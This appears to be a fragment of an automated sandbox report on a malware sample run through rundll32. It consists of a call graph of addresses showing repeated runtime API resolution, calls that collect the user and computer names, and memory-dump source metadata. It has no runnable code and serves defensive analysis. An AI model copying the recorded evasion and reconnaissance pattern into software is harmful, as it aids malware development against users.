1ff4cadcce0 LdrGetProcedureAddress 49830->49831 49832 1ff4cae19b0 49831->49832 49833 1ff4cadcce0 LdrGetProcedureAddress 49832->49833 49834 1ff4cae19c8 49833->49834 49835 1ff4cadcce0 LdrGetProcedureAddress 49834->49835 49836 1ff4cae19e0 49835->49836 49837 1ff4cadcce0 LdrGetProcedureAddress 49836->49837 49838 1ff4cae19f8 49837->49838 49839 1ff4cadcce0 LdrGetProcedureAddress 49838->49839 49840 1ff4cae1a10 49839->49840 49841 1ff4cadcce0 LdrGetProcedureAddress 49840->49841 49842 1ff4cae1a28 49841->49842 49843 1ff4cadcce0 LdrGetProcedureAddress 49842->49843 49844 1ff4cae1a40 49843->49844 49845 1ff4cadcce0 LdrGetProcedureAddress 49844->49845 49846 1ff4cae1a58 49845->49846 49847 1ff4cadcce0 LdrGetProcedureAddress 49846->49847 49848 1ff4cae1a70 49847->49848 49849 1ff4cadcce0 LdrGetProcedureAddress 49848->49849 49850 1ff4cae1a88 49849->49850 49851 1ff4cadcce0 LdrGetProcedureAddress 49850->49851 49852 1ff4cae1aa0 49851->49852 49853 1ff4cadcce0 LdrGetProcedureAddress 49852->49853 49854 1ff4cae1ab8 49853->49854 49855 1ff4cadcce0 LdrGetProcedureAddress 49854->49855 49856 1ff4cae1ad0 49855->49856 49857 1ff4cadcce0 LdrGetProcedureAddress 49856->49857 49858 1ff4cae1ae8 49857->49858 49859 1ff4cadcce0 LdrGetProcedureAddress 49858->49859 49860 1ff4cae1b00 49859->49860 49861 1ff4cadcce0 LdrGetProcedureAddress 49860->49861 49862 1ff4cae1b18 49861->49862 49863 1ff4cadcce0 LdrGetProcedureAddress 49862->49863 49864 1ff4cae1b30 49863->49864 49865 1ff4cadcce0 LdrGetProcedureAddress 49864->49865 49866 1ff4cae1b48 49865->49866 49867 1ff4cadcce0 LdrGetProcedureAddress 49866->49867 49868 1ff4cae1b60 49867->49868 49869 1ff4cadcce0 LdrGetProcedureAddress 49868->49869 49870 1ff4cae1b78 49869->49870 49871 1ff4cadcce0 LdrGetProcedureAddress 49870->49871 49872 1ff4cae1b90 49871->49872 49873 1ff4cadcce0 LdrGetProcedureAddress 49872->49873 49874 1ff4cae1bc1 49873->49874 49875 1ff4cadcce0 LdrGetProcedureAddress 49874->49875 49876 1ff4cae1bf2 49875->49876 49877 1ff4cadcce0 LdrGetProcedureAddress 
49876->49877 49878 1ff4cae1c23 49877->49878 49879 1ff4cadcce0 LdrGetProcedureAddress 49878->49879 49880 1ff4cae1c54 49879->49880 49881 1ff4cadcce0 LdrGetProcedureAddress 49880->49881 49882 1ff4cae1c85 49881->49882 49883 1ff4cadcce0 LdrGetProcedureAddress 49882->49883 49884 1ff4cae1cb6 49883->49884 49885 1ff4cadcce0 LdrGetProcedureAddress 49884->49885 49886 1ff4cae1ce7 49885->49886 49887 1ff4cadcce0 LdrGetProcedureAddress 49886->49887 49888 1ff4cae1d18 49887->49888 49889 1ff4cadcce0 LdrGetProcedureAddress 49888->49889 49890 1ff4cae1d49 49889->49890 49891 1ff4cadcce0 LdrGetProcedureAddress 49890->49891 49892 1ff4cae1d7a 49891->49892 49893 1ff4cadcce0 LdrGetProcedureAddress 49892->49893 49894 1ff4cae1dab 49893->49894 49895 1ff4cadcce0 LdrGetProcedureAddress 49894->49895 49896 1ff4cae1ddc 49895->49896 49897 1ff4cadcce0 LdrGetProcedureAddress 49896->49897 49898 1ff4cae1e0d 49897->49898 49899 1ff4cadcce0 LdrGetProcedureAddress 49898->49899 49900 1ff4cae1e3e 49899->49900 49901 1ff4cadcce0 LdrGetProcedureAddress 49900->49901 49902 1ff4cae1e6f 49901->49902 49903 1ff4cadcce0 LdrGetProcedureAddress 49902->49903 49904 1ff4cae1ea0 49903->49904 49905 1ff4cadcce0 LdrGetProcedureAddress 49904->49905 49906 1ff4cae1ed1 49905->49906 49907 1ff4cadcce0 LdrGetProcedureAddress 49906->49907 49908 1ff4cae1f02 49907->49908 49909 1ff4cadcce0 LdrGetProcedureAddress 49908->49909 49910 1ff4cae1f33 49909->49910 49911 1ff4cadcce0 LdrGetProcedureAddress 49910->49911 49912 1ff4cae1f64 49911->49912 49913 1ff4cadcce0 LdrGetProcedureAddress 49912->49913 49914 1ff4cae1f95 49913->49914 49915 1ff4cadcce0 LdrGetProcedureAddress 49914->49915 49916 1ff4cae1fc6 49915->49916 49917 1ff4cadcce0 LdrGetProcedureAddress 49916->49917 49918 1ff4cae1ff7 49917->49918 49919 1ff4cadcce0 LdrGetProcedureAddress 49918->49919 49920 1ff4cae2028 49919->49920 49921 1ff4cadcce0 LdrGetProcedureAddress 49920->49921 49922 1ff4cae2059 49921->49922 49923 1ff4cadcce0 LdrGetProcedureAddress 49922->49923 49924 1ff4cae208a 49923->49924 
49925 1ff4cadcce0 LdrGetProcedureAddress 49924->49925 49926 1ff4cae20bb 49925->49926 49927 1ff4cadcce0 LdrGetProcedureAddress 49926->49927 49928 1ff4cae20ec 49927->49928 49929 1ff4cadcce0 LdrGetProcedureAddress 49928->49929 49930 1ff4cae211d 49929->49930 49931 1ff4cadcce0 LdrGetProcedureAddress 49930->49931 49932 1ff4cae214e 49931->49932 49933 1ff4cadcce0 LdrGetProcedureAddress 49932->49933 49934 1ff4cae217f 49933->49934 49935 1ff4cadcce0 LdrGetProcedureAddress 49934->49935 49936 1ff4cae21b0 49935->49936 49937 1ff4cadcce0 LdrGetProcedureAddress 49936->49937 49937->49768 49939 1ff4cae01ce 49938->49939 49940 1ff4cae0e4a 49939->49940 49941 1ff4cadcce0 LdrGetProcedureAddress 49939->49941 49940->49753 49942 1ff4cae0228 49941->49942 49943 1ff4cadcce0 LdrGetProcedureAddress 49942->49943 49944 1ff4cae0243 49943->49944 49945 1ff4cadcce0 LdrGetProcedureAddress 49944->49945 49946 1ff4cae026c 49945->49946 49947 1ff4cadcce0 LdrGetProcedureAddress 49946->49947 49948 1ff4cae028b 49947->49948 49949 1ff4cadcce0 LdrGetProcedureAddress 49948->49949 49950 1ff4cae02aa 49949->49950 49951 1ff4cadcce0 LdrGetProcedureAddress 49950->49951 49952 1ff4cae02c9 49951->49952 49953 1ff4cadcce0 LdrGetProcedureAddress 49952->49953 49954 1ff4cae02e8 49953->49954 49955 1ff4cadcce0 LdrGetProcedureAddress 49954->49955 49956 1ff4cae0307 49955->49956 49957 1ff4cadcce0 LdrGetProcedureAddress 49956->49957 49958 1ff4cae0326 49957->49958 49959 1ff4cadcce0 LdrGetProcedureAddress 49958->49959 49960 1ff4cae0345 49959->49960 49961 1ff4cadcce0 LdrGetProcedureAddress 49960->49961 49962 1ff4cae0364 49961->49962 49963 1ff4cadcce0 LdrGetProcedureAddress 49962->49963 49964 1ff4cae0383 49963->49964 49965 1ff4cadcce0 LdrGetProcedureAddress 49964->49965 49966 1ff4cae03a2 49965->49966 49967 1ff4cadcce0 LdrGetProcedureAddress 49966->49967 49968 1ff4cae03c1 49967->49968 49969 1ff4cadcce0 LdrGetProcedureAddress 49968->49969 49970 1ff4cae03e0 49969->49970 49971 1ff4cadcce0 LdrGetProcedureAddress 49970->49971 49972 1ff4cae03ff 
49971->49972 49973 1ff4cadcce0 LdrGetProcedureAddress 49972->49973 49974 1ff4cae041e 49973->49974 49975 1ff4cadcce0 LdrGetProcedureAddress 49974->49975 49976 1ff4cae043d 49975->49976 49977 1ff4cadcce0 LdrGetProcedureAddress 49976->49977 49978 1ff4cae045c 49977->49978 49979 1ff4cadcce0 LdrGetProcedureAddress 49978->49979 49980 1ff4cae047b 49979->49980 49981 1ff4cadcce0 LdrGetProcedureAddress 49980->49981 49982 1ff4cae049a 49981->49982 49983 1ff4cadcce0 LdrGetProcedureAddress 49982->49983 49984 1ff4cae04b9 49983->49984 49985 1ff4cadcce0 LdrGetProcedureAddress 49984->49985 49986 1ff4cae04d8 49985->49986 49987 1ff4cadcce0 LdrGetProcedureAddress 49986->49987 49988 1ff4cae04f7 49987->49988 49989 1ff4cadcce0 LdrGetProcedureAddress 49988->49989 49990 1ff4cae0516 49989->49990 49991 1ff4cadcce0 LdrGetProcedureAddress 49990->49991 49992 1ff4cae0535 49991->49992 49993 1ff4cadcce0 LdrGetProcedureAddress 49992->49993 49994 1ff4cae0554 49993->49994 49995 1ff4cadcce0 LdrGetProcedureAddress 49994->49995 49996 1ff4cae0573 49995->49996 49997 1ff4cadcce0 LdrGetProcedureAddress 49996->49997 49998 1ff4cae0592 49997->49998 49999 1ff4cadcce0 LdrGetProcedureAddress 49998->49999 50000 1ff4cae05b1 49999->50000 50001 1ff4cadcce0 LdrGetProcedureAddress 50000->50001 50002 1ff4cae05d0 50001->50002 50003 1ff4cadcce0 LdrGetProcedureAddress 50002->50003 50004 1ff4cae05ef 50003->50004 50005 1ff4cadcce0 LdrGetProcedureAddress 50004->50005 50006 1ff4cae060e 50005->50006 50007 1ff4cadcce0 LdrGetProcedureAddress 50006->50007 50008 1ff4cae062d 50007->50008 50009 1ff4cadcce0 LdrGetProcedureAddress 50008->50009 50010 1ff4cae064c 50009->50010 50011 1ff4cadcce0 LdrGetProcedureAddress 50010->50011 50012 1ff4cae066b 50011->50012 50013 1ff4cadcce0 LdrGetProcedureAddress 50012->50013 50014 1ff4cae068a 50013->50014 50015 1ff4cadcce0 LdrGetProcedureAddress 50014->50015 50016 1ff4cae06a9 50015->50016 50017 1ff4cadcce0 LdrGetProcedureAddress 50016->50017 50018 1ff4cae06c8 50017->50018 50019 1ff4cadcce0 
LdrGetProcedureAddress 50018->50019 50020 1ff4cae06e7 50019->50020 50021 1ff4cadcce0 LdrGetProcedureAddress 50020->50021 50022 1ff4cae0706 50021->50022 50023 1ff4cadcce0 LdrGetProcedureAddress 50022->50023 50024 1ff4cae0725 50023->50024 50025 1ff4cadcce0 LdrGetProcedureAddress 50024->50025 50026 1ff4cae0744 50025->50026 50027 1ff4cadcce0 LdrGetProcedureAddress 50026->50027 50028 1ff4cae0763 50027->50028 50029 1ff4cadcce0 LdrGetProcedureAddress 50028->50029 50030 1ff4cae0782 50029->50030 50031 1ff4cadcce0 LdrGetProcedureAddress 50030->50031 50032 1ff4cae07a1 50031->50032 50033 1ff4cadcce0 LdrGetProcedureAddress 50032->50033 50034 1ff4cae07c0 50033->50034 50035 1ff4cadcce0 LdrGetProcedureAddress 50034->50035 50036 1ff4cae07df 50035->50036 50037 1ff4cadcce0 LdrGetProcedureAddress 50036->50037 50038 1ff4cae07fe 50037->50038 50039 1ff4cadcce0 LdrGetProcedureAddress 50038->50039 50040 1ff4cae081d 50039->50040 50041 1ff4cadcce0 LdrGetProcedureAddress 50040->50041 50042 1ff4cae083c 50041->50042 50043 1ff4cadcce0 LdrGetProcedureAddress 50042->50043 50044 1ff4cae085b 50043->50044 50045 1ff4cadcce0 LdrGetProcedureAddress 50044->50045 50046 1ff4cae087a 50045->50046 50047 1ff4cadcce0 LdrGetProcedureAddress 50046->50047 50048 1ff4cae0899 50047->50048 50049 1ff4cadcce0 LdrGetProcedureAddress 50048->50049 50050 1ff4cae08b8 50049->50050 50051 1ff4cadcce0 LdrGetProcedureAddress 50050->50051 50052 1ff4cae08d7 50051->50052 50053 1ff4cadcce0 LdrGetProcedureAddress 50052->50053 50054 1ff4cae08f6 50053->50054 50055 1ff4cadcce0 LdrGetProcedureAddress 50054->50055 50056 1ff4cae0915 50055->50056 50057 1ff4cadcce0 LdrGetProcedureAddress 50056->50057 50058 1ff4cae0934 50057->50058 50059 1ff4cadcce0 LdrGetProcedureAddress 50058->50059 50060 1ff4cae0953 50059->50060 50061 1ff4cadcce0 LdrGetProcedureAddress 50060->50061 50062 1ff4cae0972 50061->50062 50063 1ff4cadcce0 LdrGetProcedureAddress 50062->50063 50064 1ff4cae0991 50063->50064 50065 1ff4cadcce0 LdrGetProcedureAddress 50064->50065 50066 
1ff4cae09b0 50065->50066 50067 1ff4cadcce0 LdrGetProcedureAddress 50066->50067 50068 1ff4cae09cf 50067->50068 50069 1ff4cadcce0 LdrGetProcedureAddress 50068->50069 50070 1ff4cae09ee 50069->50070 50071 1ff4cadcce0 LdrGetProcedureAddress 50070->50071 50072 1ff4cae0a0d 50071->50072 50073 1ff4cadcce0 LdrGetProcedureAddress 50072->50073 50074 1ff4cae0a2c 50073->50074 50075 1ff4cadcce0 LdrGetProcedureAddress 50074->50075 50076 1ff4cae0a4b 50075->50076 50077 1ff4cadcce0 LdrGetProcedureAddress 50076->50077 50078 1ff4cae0a6a 50077->50078 50079 1ff4cadcce0 LdrGetProcedureAddress 50078->50079 50080 1ff4cae0a89 50079->50080 50081 1ff4cadcce0 LdrGetProcedureAddress 50080->50081 50082 1ff4cae0aa8 50081->50082 50083 1ff4cadcce0 LdrGetProcedureAddress 50082->50083 50084 1ff4cae0ac7 50083->50084 50085 1ff4cadcce0 LdrGetProcedureAddress 50084->50085 50086 1ff4cae0ae6 50085->50086 50087 1ff4cadcce0 LdrGetProcedureAddress 50086->50087 50088 1ff4cae0b05 50087->50088 50089 1ff4cadcce0 LdrGetProcedureAddress 50088->50089 50090 1ff4cae0b24 50089->50090 50091 1ff4cadcce0 LdrGetProcedureAddress 50090->50091 50092 1ff4cae0b43 50091->50092 50093 1ff4cadcce0 LdrGetProcedureAddress 50092->50093 50094 1ff4cae0b62 50093->50094 50095 1ff4cadcce0 LdrGetProcedureAddress 50094->50095 50096 1ff4cae0b81 50095->50096 50097 1ff4cadcce0 LdrGetProcedureAddress 50096->50097 50098 1ff4cae0ba0 50097->50098 50099 1ff4cadcce0 LdrGetProcedureAddress 50098->50099 50100 1ff4cae0bbf 50099->50100 50101 1ff4cadcce0 LdrGetProcedureAddress 50100->50101 50102 1ff4cae0bde 50101->50102 50103 1ff4cadcce0 LdrGetProcedureAddress 50102->50103 50104 1ff4cae0bfd 50103->50104 50105 1ff4cadcce0 LdrGetProcedureAddress 50104->50105 50106 1ff4cae0c1c 50105->50106 50107 1ff4cadcce0 LdrGetProcedureAddress 50106->50107 50108 1ff4cae0c3b 50107->50108 50109 1ff4cadcce0 LdrGetProcedureAddress 50108->50109 50110 1ff4cae0c5a 50109->50110 50111 1ff4cadcce0 LdrGetProcedureAddress 50110->50111 50112 1ff4cae0c79 50111->50112 50113 1ff4cadcce0 
LdrGetProcedureAddress 50112->50113 50114 1ff4cae0c98 50113->50114 50115 1ff4cadcce0 LdrGetProcedureAddress 50114->50115 50116 1ff4cae0cb7 50115->50116 50117 1ff4cadcce0 LdrGetProcedureAddress 50116->50117 50118 1ff4cae0cd6 50117->50118 50119 1ff4cadcce0 LdrGetProcedureAddress 50118->50119 50120 1ff4cae0cf5 50119->50120 50121 1ff4cadcce0 LdrGetProcedureAddress 50120->50121 50122 1ff4cae0d14 50121->50122 50123 1ff4cadcce0 LdrGetProcedureAddress 50122->50123 50124 1ff4cae0d33 50123->50124 50125 1ff4cadcce0 LdrGetProcedureAddress 50124->50125 50126 1ff4cae0d52 50125->50126 50127 1ff4cadcce0 LdrGetProcedureAddress 50126->50127 50128 1ff4cae0d71 50127->50128 50129 1ff4cadcce0 LdrGetProcedureAddress 50128->50129 50130 1ff4cae0d90 50129->50130 50131 1ff4cadcce0 LdrGetProcedureAddress 50130->50131 50132 1ff4cae0daf 50131->50132 50133 1ff4cadcce0 LdrGetProcedureAddress 50132->50133 50134 1ff4cae0dce 50133->50134 50135 1ff4cadcce0 LdrGetProcedureAddress 50134->50135 50136 1ff4cae0ded 50135->50136 50137 1ff4cadcce0 LdrGetProcedureAddress 50136->50137 50138 1ff4cae0e0c 50137->50138 50139 1ff4cadcce0 LdrGetProcedureAddress 50138->50139 50140 1ff4cae0e2b 50139->50140 50141 1ff4cadcce0 LdrGetProcedureAddress 50140->50141 50141->49940 50144 1ff4cadcd1b 50142->50144 50143 1ff4cadcdbf 50143->49757 50144->50143 50145 1ff4cadcd9b LdrGetProcedureAddress 50144->50145 50145->50143 50146 1ff4cad7bf0 50147 1ff4cad7c06 50146->50147 50163 1ff4cad2930 50147->50163 50149 1ff4cad7c24 50302 1ff4cad8ed0 50149->50302 50151 1ff4cad7d64 50335 1ff4cad7f70 50151->50335 50153 1ff4cad7d8c 50476 1ff4caf4d00 GetUserNameW GetComputerNameExW 50153->50476 50155 1ff4cad7f54 50156 1ff4cad7da4 50156->50155 50508 1ff4cb04740 50156->50508 50159 1ff4cae4700 RtlFreeHeap 50162 1ff4cad7e3b 50159->50162 50161 1ff4cae8c60 CreateFiber DeleteFiber 50161->50162 50162->50155 50162->50159 50162->50161 50512 1ff4cae3d90 8 API calls 50162->50512 50513 1ff4cad8bc0 50162->50513 50562 1ff4cadffe0 50163->50562 50169 1ff4cad2943 
50170 1ff4cadf5f5 50169->50170 50171 1ff4cadcce0 LdrGetProcedureAddress 50169->50171 50170->50149 50172 1ff4cadee10 50171->50172 50173 1ff4cadcce0 LdrGetProcedureAddress 50172->50173 50174 1ff4cadee2b 50173->50174 50175 1ff4cadcce0 LdrGetProcedureAddress 50174->50175 50176 1ff4cadee54 50175->50176 50177 1ff4cadcce0 LdrGetProcedureAddress 50176->50177 50178 1ff4cadee73 50177->50178 50179 1ff4cadcce0 LdrGetProcedureAddress 50178->50179 50180 1ff4cadee92 50179->50180 50181 1ff4cadcce0 LdrGetProcedureAddress 50180->50181 50182 1ff4cadeeb1 50181->50182 50183 1ff4cadcce0 LdrGetProcedureAddress 50182->50183 50184 1ff4cadeed0 50183->50184 50185 1ff4cadcce0 LdrGetProcedureAddress 50184->50185 50186 1ff4cadeeef 50185->50186 50187 1ff4cadcce0 LdrGetProcedureAddress 50186->50187 50188 1ff4cadef0e 50187->50188 50189 1ff4cadcce0 LdrGetProcedureAddress 50188->50189 50190 1ff4cadef2d 50189->50190 50191 1ff4cadcce0 LdrGetProcedureAddress 50190->50191 50192 1ff4cadef4c 50191->50192 50193 1ff4cadcce0 LdrGetProcedureAddress 50192->50193 50194 1ff4cadef6b 50193->50194 50195 1ff4cadcce0 LdrGetProcedureAddress 50194->50195 50196 1ff4cadef8a 50195->50196 50197 1ff4cadcce0 LdrGetProcedureAddress 50196->50197 50198 1ff4cadefa9 50197->50198 50199 1ff4cadcce0 LdrGetProcedureAddress 50198->50199 50200 1ff4cadefc8 50199->50200 50201 1ff4cadcce0 LdrGetProcedureAddress 50200->50201 50202 1ff4cadefe7 50201->50202 50203 1ff4cadcce0 LdrGetProcedureAddress 50202->50203 50204 1ff4cadf006 50203->50204 50205 1ff4cadcce0 LdrGetProcedureAddress 50204->50205 50206 1ff4cadf025 50205->50206 50207 1ff4cadcce0 LdrGetProcedureAddress 50206->50207 50208 1ff4cadf044 50207->50208 50209 1ff4cadcce0 LdrGetProcedureAddress 50208->50209 50210 1ff4cadf063 50209->50210 50211 1ff4cadcce0 LdrGetProcedureAddress 50210->50211 50212 1ff4cadf082 50211->50212 50213 1ff4cadcce0 LdrGetProcedureAddress 50212->50213 50214 1ff4cadf0a1 50213->50214 50215 1ff4cadcce0 LdrGetProcedureAddress 50214->50215 50216 1ff4cadf0c0 50215->50216 
50217 1ff4cadcce0 LdrGetProcedureAddress 50216->50217 50218 1ff4cadf0df 50217->50218 50219 1ff4cadcce0 LdrGetProcedureAddress 50218->50219 50220 1ff4cadf0fe 50219->50220 50221 1ff4cadcce0 LdrGetProcedureAddress 50220->50221 50222 1ff4cadf11d 50221->50222 50223 1ff4cadcce0 LdrGetProcedureAddress 50222->50223 50224 1ff4cadf13c 50223->50224 50225 1ff4cadcce0 LdrGetProcedureAddress 50224->50225 50226 1ff4cadf15b 50225->50226 50227 1ff4cadcce0 LdrGetProcedureAddress 50226->50227 50228 1ff4cadf17a 50227->50228 50229 1ff4cadcce0 LdrGetProcedureAddress 50228->50229 50230 1ff4cadf199 50229->50230 50231 1ff4cadcce0 LdrGetProcedureAddress 50230->50231 50232 1ff4cadf1b8 50231->50232 50233 1ff4cadcce0 LdrGetProcedureAddress 50232->50233 50234 1ff4cadf1d7 50233->50234 50235 1ff4cadcce0 LdrGetProcedureAddress 50234->50235 50236 1ff4cadf1f6 50235->50236 50237 1ff4cadcce0 LdrGetProcedureAddress 50236->50237 50238 1ff4cadf215 50237->50238 50239 1ff4cadcce0 LdrGetProcedureAddress 50238->50239 50240 1ff4cadf234 50239->50240 50241 1ff4cadcce0 LdrGetProcedureAddress 50240->50241 50242 1ff4cadf253 50241->50242 50243 1ff4cadcce0 LdrGetProcedureAddress 50242->50243 50244 1ff4cadf272 50243->50244 50245 1ff4cadcce0 LdrGetProcedureAddress 50244->50245 50246 1ff4cadf291 50245->50246 50247 1ff4cadcce0 LdrGetProcedureAddress 50246->50247 50248 1ff4cadf2b0 50247->50248 50249 1ff4cadcce0 LdrGetProcedureAddress 50248->50249 50250 1ff4cadf2cf 50249->50250 50251 1ff4cadcce0 LdrGetProcedureAddress 50250->50251 50252 1ff4cadf2ee 50251->50252 50253 1ff4cadcce0 LdrGetProcedureAddress 50252->50253 50254 1ff4cadf30d 50253->50254 50255 1ff4cadcce0 LdrGetProcedureAddress 50254->50255 50256 1ff4cadf32c 50255->50256 50257 1ff4cadcce0 LdrGetProcedureAddress 50256->50257 50258 1ff4cadf34b 50257->50258 50259 1ff4cadcce0 LdrGetProcedureAddress 50258->50259 50260 1ff4cadf36a 50259->50260 50261 1ff4cadcce0 LdrGetProcedureAddress 50260->50261 50262 1ff4cadf389 50261->50262 50263 1ff4cadcce0 LdrGetProcedureAddress 
50262->50263 50264 1ff4cadf3a8 50263->50264 50265 1ff4cadcce0 LdrGetProcedureAddress 50264->50265 50266 1ff4cadf3c7 50265->50266 50267 1ff4cadcce0 LdrGetProcedureAddress 50266->50267 50268 1ff4cadf3e6 50267->50268 50269 1ff4cadcce0 LdrGetProcedureAddress 50268->50269 50270 1ff4cadf405 50269->50270 50271 1ff4cadcce0 LdrGetProcedureAddress 50270->50271 50272 1ff4cadf424 50271->50272 50273 1ff4cadcce0 LdrGetProcedureAddress 50272->50273 50274 1ff4cadf443 50273->50274 50275 1ff4cadcce0 LdrGetProcedureAddress 50274->50275 50276 1ff4cadf462 50275->50276 50277 1ff4cadcce0 LdrGetProcedureAddress 50276->50277 50278 1ff4cadf481 50277->50278 50279 1ff4cadcce0 LdrGetProcedureAddress 50278->50279 50280 1ff4cadf4a0 50279->50280 50281 1ff4cadcce0 LdrGetProcedureAddress 50280->50281 50282 1ff4cadf4bf 50281->50282 50283 1ff4cadcce0 LdrGetProcedureAddress 50282->50283 50284 1ff4cadf4de 50283->50284 50285 1ff4cadcce0 LdrGetProcedureAddress 50284->50285 50286 1ff4cadf4fd 50285->50286 50287 1ff4cadcce0 LdrGetProcedureAddress 50286->50287 50288 1ff4cadf51c 50287->50288 50289 1ff4cadcce0 LdrGetProcedureAddress 50288->50289 50290 1ff4cadf53b 50289->50290 50291 1ff4cadcce0 LdrGetProcedureAddress 50290->50291 50292 1ff4cadf55a 50291->50292 50293 1ff4cadcce0 LdrGetProcedureAddress 50292->50293 50294 1ff4cadf579 50293->50294 50295 1ff4cadcce0 LdrGetProcedureAddress 50294->50295 50296 1ff4cadf598 50295->50296 50297 1ff4cadcce0 LdrGetProcedureAddress 50296->50297 50298 1ff4cadf5b7 50297->50298 50299 1ff4cadcce0 LdrGetProcedureAddress 50298->50299 50300 1ff4cadf5d6 50299->50300 50301 1ff4cadcce0 LdrGetProcedureAddress 50300->50301 50301->50170 50634 1ff4caf4ce0 50302->50634 50307 1ff4cb03de0 RtlFreeHeap 50308 1ff4cad90af 50307->50308 50309 1ff4cb03de0 RtlFreeHeap 50308->50309 50310 1ff4cad9110 50309->50310 50311 1ff4cb03de0 RtlFreeHeap 50310->50311 50312 1ff4cad916c 50311->50312 50313 1ff4cb03de0 RtlFreeHeap 50312->50313 50314 1ff4cad91a1 50313->50314 50315 1ff4cb03de0 RtlFreeHeap 50314->50315 
50316 1ff4cad91f1 50315->50316 50317 1ff4cb03de0 RtlFreeHeap 50316->50317 50318 1ff4cad9222 50317->50318 50319 1ff4cb03de0 RtlFreeHeap 50318->50319 50320 1ff4cad925a 50319->50320 50321 1ff4cb03de0 RtlFreeHeap 50320->50321 50322 1ff4cad92af 50321->50322 50323 1ff4cb03de0 RtlFreeHeap 50322->50323 50324 1ff4cad92f1 50323->50324 50325 1ff4cb03de0 RtlFreeHeap 50324->50325 50326 1ff4cad9333 50325->50326 50327 1ff4cb03de0 RtlFreeHeap 50326->50327 50328 1ff4cad9347 50327->50328 50329 1ff4cb03de0 RtlFreeHeap 50328->50329 50330 1ff4cad9362 50329->50330 50331 1ff4cb03de0 RtlFreeHeap 50330->50331 50332 1ff4cad938e 50331->50332 50333 1ff4cb03de0 RtlFreeHeap 50332->50333 50334 1ff4cad93c1 50333->50334 50334->50151 50336 1ff4cad7fb8 50335->50336 50337 1ff4cad7f99 50335->50337 50338 1ff4cad7fda 50336->50338 50340 1ff4cb03de0 RtlFreeHeap 50336->50340 50339 1ff4cb03de0 RtlFreeHeap 50337->50339 50640 1ff4caf5560 50338->50640 50339->50336 50340->50338 50344 1ff4caf5560 RtlFreeHeap 50348 1ff4cad8066 50344->50348 50345 1ff4cad802a 50345->50344 50346 1ff4cad8088 50347 1ff4caf5560 RtlFreeHeap 50346->50347 50352 1ff4cad809c 50347->50352 50348->50346 50349 1ff4cafb4e0 RtlFreeHeap 50348->50349 50349->50346 50350 1ff4cad80be 50351 1ff4caf5560 RtlFreeHeap 50350->50351 50356 1ff4cad80d2 50351->50356 50352->50350 50353 1ff4cafb4e0 RtlFreeHeap 50352->50353 50353->50350 50354 1ff4cad80f4 50355 1ff4caf5560 RtlFreeHeap 50354->50355 50360 1ff4cad8108 50355->50360 50356->50354 50357 1ff4cafb4e0 RtlFreeHeap 50356->50357 50357->50354 50358 1ff4cad812a 50359 1ff4caf5560 RtlFreeHeap 50358->50359 50364 1ff4cad813e 50359->50364 50360->50358 50361 1ff4cafb4e0 RtlFreeHeap 50360->50361 50361->50358 50362 1ff4cad8160 50363 1ff4caf5560 RtlFreeHeap 50362->50363 50368 1ff4cad8174 50363->50368 50364->50362 50365 1ff4cafb4e0 RtlFreeHeap 50364->50365 50365->50362 50366 1ff4cad8197 50367 1ff4caf5560 RtlFreeHeap 50366->50367 50373 1ff4cad81ab 50367->50373 50368->50366 50369 1ff4cafb4e0 RtlFreeHeap 50368->50369 
50369->50366 50370 1ff4cad81d4 50371 1ff4caf5560 RtlFreeHeap 50370->50371 50372 1ff4cad81e8 50371->50372 50374 1ff4cad823d 50372->50374 50376 1ff4caebe20 RtlFreeHeap 50372->50376 50373->50370 50375 1ff4cafb4e0 RtlFreeHeap 50373->50375 50377 1ff4caf5560 RtlFreeHeap 50374->50377 50375->50370 50378 1ff4cad8214 50376->50378 50383 1ff4cad8251 50377->50383 50381 1ff4cafb4e0 RtlFreeHeap 50378->50381 50379 1ff4cad838a 50380 1ff4caf5560 RtlFreeHeap 50379->50380 50382 1ff4cad839e 50380->50382 50384 1ff4cad8235 50381->50384 50385 1ff4caf5560 RtlFreeHeap 50382->50385 50383->50379 50391 1ff4cad8322 50383->50391 50648 1ff4cada050 RtlFreeHeap 50383->50648 50386 1ff4cafb4e0 RtlFreeHeap 50384->50386 50398 1ff4cad83ba 50385->50398 50386->50374 50387 1ff4cad8430 50388 1ff4caf5560 RtlFreeHeap 50387->50388 50389 1ff4cad8444 50388->50389 50390 1ff4cad846d 50389->50390 50393 1ff4caebe20 RtlFreeHeap 50389->50393 50397 1ff4caf5560 RtlFreeHeap 50390->50397 50392 1ff4cad835d 50391->50392 50649 1ff4cada050 RtlFreeHeap 50391->50649 50395 1ff4cafb4e0 RtlFreeHeap 50392->50395 50396 1ff4cad8460 50393->50396 50399 1ff4cad837d 50395->50399 50400 1ff4cafb4e0 RtlFreeHeap 50396->50400 50402 1ff4cad848e 50397->50402 50398->50387 50403 1ff4cafb4e0 RtlFreeHeap 50398->50403 50464 1ff4cad8b86 50398->50464 50404 1ff4cafb4e0 RtlFreeHeap 50399->50404 50400->50390 50405 1ff4cad84b7 50402->50405 50407 1ff4caebe20 RtlFreeHeap 50402->50407 50406 1ff4cad8423 50403->50406 50404->50379 50409 1ff4caf5560 RtlFreeHeap 50405->50409 50408 1ff4cafb4e0 RtlFreeHeap 50406->50408 50410 1ff4cad84aa 50407->50410 50408->50387 50411 1ff4cad84d8 50409->50411 50412 1ff4cafb4e0 RtlFreeHeap 50410->50412 50413 1ff4cad8501 50411->50413 50414 1ff4caebe20 RtlFreeHeap 50411->50414 50412->50405 50416 1ff4caf5560 RtlFreeHeap 50413->50416 50415 1ff4cad84f4 50414->50415 50417 1ff4cafb4e0 RtlFreeHeap 50415->50417 50418 1ff4cad8522 50416->50418 50417->50413 50419 1ff4cad854b 50418->50419 50420 1ff4caebe20 RtlFreeHeap 50418->50420 50421 

Control-flow Graph

[Control-flow graph not preserved. Function entry: 180055c62. API calls shown in the graph: VirtualAlloc.]

Memory Dump Source
• Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
